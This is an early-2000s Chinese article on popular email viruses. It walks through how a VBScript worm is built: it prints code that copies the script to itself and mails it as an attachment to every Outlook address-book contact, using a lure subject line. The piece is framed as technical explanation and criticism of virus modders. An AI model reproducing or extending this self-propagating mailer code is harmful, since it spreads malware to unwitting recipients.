流行病毒分析

文：Refdom

　　最近气候温和，病毒滋生。先有“广外女生”木马病毒摆姿弄骚，后“齿轮先生”又出来逞凶，美国佬也哇哇叫唤“RED CODE”搞死他们了，连国防部都要关门。真是世道不平，人心惶惶啊。大家还是都把电脑关关，微软杀杀了吧！整个世界清净了。

　　现在互联网成了病毒传播最佳通道，当然“天杀的微软”贡献也不小。现在大多数病毒都是通过EMAIL传播的。而且手段相似，无非是在附件中安置病毒本体，然后利用人类天生的好奇心，通过邮件主题或邮件内容诱惑人们点击附件中的病毒体。比如I Love You , 库尔尼科娃病毒、蔡依林裸照病毒、Sircam也一样。收信人在收到邮件后，发现这些诱人的内容，就轻易会中这样的病毒。

　　其实，这些病毒都没什么了不起，毕竟诱导让人们去点击附件里的病毒程序，如果真是直接告诉你这就是病毒，那它也没什么繁衍机会了。

　　能自我复制、扩散的程序就可以成为病毒了。Windows系统之所以还没有成为病毒是因为它目前没有自我复制。不过，“破坏性”对人们的印象比自我复制更深。
　　其实病毒是很容易制造的（不复杂的病毒），比如流行的脚本病毒，都利用视窗系统的开放性的特点。特别是COM到COM+的组件编程思路，一个脚本程序能调用功能更大的组件来完成自己的功能。以VB脚本病毒（如欢乐时光、 I Love You 、库尔尼科娃病毒、Homepage病毒等）为例，他们都是把.vbs脚本文件添在附件中，最后使用*.htm.vbs等欺骗性的文件名。

我们以普通的vb脚本来看看。
Set objFs=CreateObject(“Scripting.FileSystemObject”)‘创建一个文件操作对象
objFs.CreateTextFile("C:\virus.txt", 1)‘通过文件操作对象的方法创建了一个TXT文件。

　　如果我们把这两句话保存成为.vbs的VB脚本文件，点击就会在C盘中创建一个TXT文件了。
　　倘若我们把第二句改为：
objFs.GetFile(WScript.ScriptFullName).Copy("C:\virus.vbs")

　　就可以将自身复制到c盘virus.vbs这个文件。它的意思是把程序本身的内容COPY到目的地。这样就让这么简单的两句话实现了自我复制的功能，已经具备病毒的基本特征。如果我们要给它添加感染特性，

Set objOA=Wscript.CreateObject("Outlook.Application") ‘创建一个OUTLOOK应用的对象
Set objMapi=objOA.GetNameSpace("MAPI")‘取得MAPI名字空间
For i=1 to objMapi.AddressLists.Count‘遍历地址簿
Set objAddList=objMapi.AddressLists(i)
For j=1 To objAddList. AddressEntries.Count
Set objMail=objOA.CreateItem(0)
objMail.Recipients.Add(objAddList. AddressEntries(j)) ‘取得邮件地址，收件人
objMail.Subject = "你好!"
objMail.Body = "这次给你的附件是我的新文档！"
objMail.Attachments.Add(“c:\virus.vbs")‘把自己作为附件扩散出去
objMail.Send‘发送邮件
Next
Next
Set objMapi=Nothing
Set objOA=Nothing

上面的代码就通过又把自己以附件的方式扩散出去。

　　我们可以看出，仅仅这么简单的代码，就能成为具有自我复制、繁殖、骚扰网络的病毒了。当然，我们可以为它添加更多的本领，比如：修改注册表、删除文件、发送被感染者的文件、隐藏自己，感染其他文件。其实，以目前视窗系统的编程开放特性，上面的功能都很容易实现。一个中级的VB程序员，没有任何的汇编知识，很容易就能制作类似的蠕虫病毒。
　　计算机世界的不断发展，界面的友好性以及代码开放性都为病毒的产生提供更好的平台。一个程序简单的病毒，同样能够成为破坏力强大的超级病毒。可以这么说：病毒制作早已经进入高级编程阶段。不会低级机器语言的程序员，也能够制作功能强大的病毒。

　　正是因为病毒制作进入高级编程阶段，使得病毒的制作更加容易，更多稍微有编程基础的人就能写出病毒来。同时，象脚本病毒这样的代码，如果不加密，它的原程序也能轻松看见，这被更多的有低级趣味的低级程序员所利用。从 I Love You 等脚本病毒开始，它们的代码也象病毒一样扩散开来，被人改装过后就发展成新的病毒，什么Homepage、Mayday等，都几乎差不多。最近，又有人改装成Jessica Worm病毒，用“163电子邮箱收费通知”做标题，其基本代码和扩散部分代码完全是I Love You 病毒的D版。

　　本文讲解的内容主要是针对最近各种病毒蔓延而作的。一是告诉大家现在病毒没什么了不起，二是告诉大家防止病毒感染的方案。也要说明的是，病毒制作早已经进入高级编程阶段，通过改装代码继续扩散病毒的人，该住手了。

　　本人写这篇文章只是作为技术研究，没有任何其他意思。如果有人利用本文提供的内容作破坏，都与本人无关。
　　限于本人的水平，文中有误的地方请多包含指教。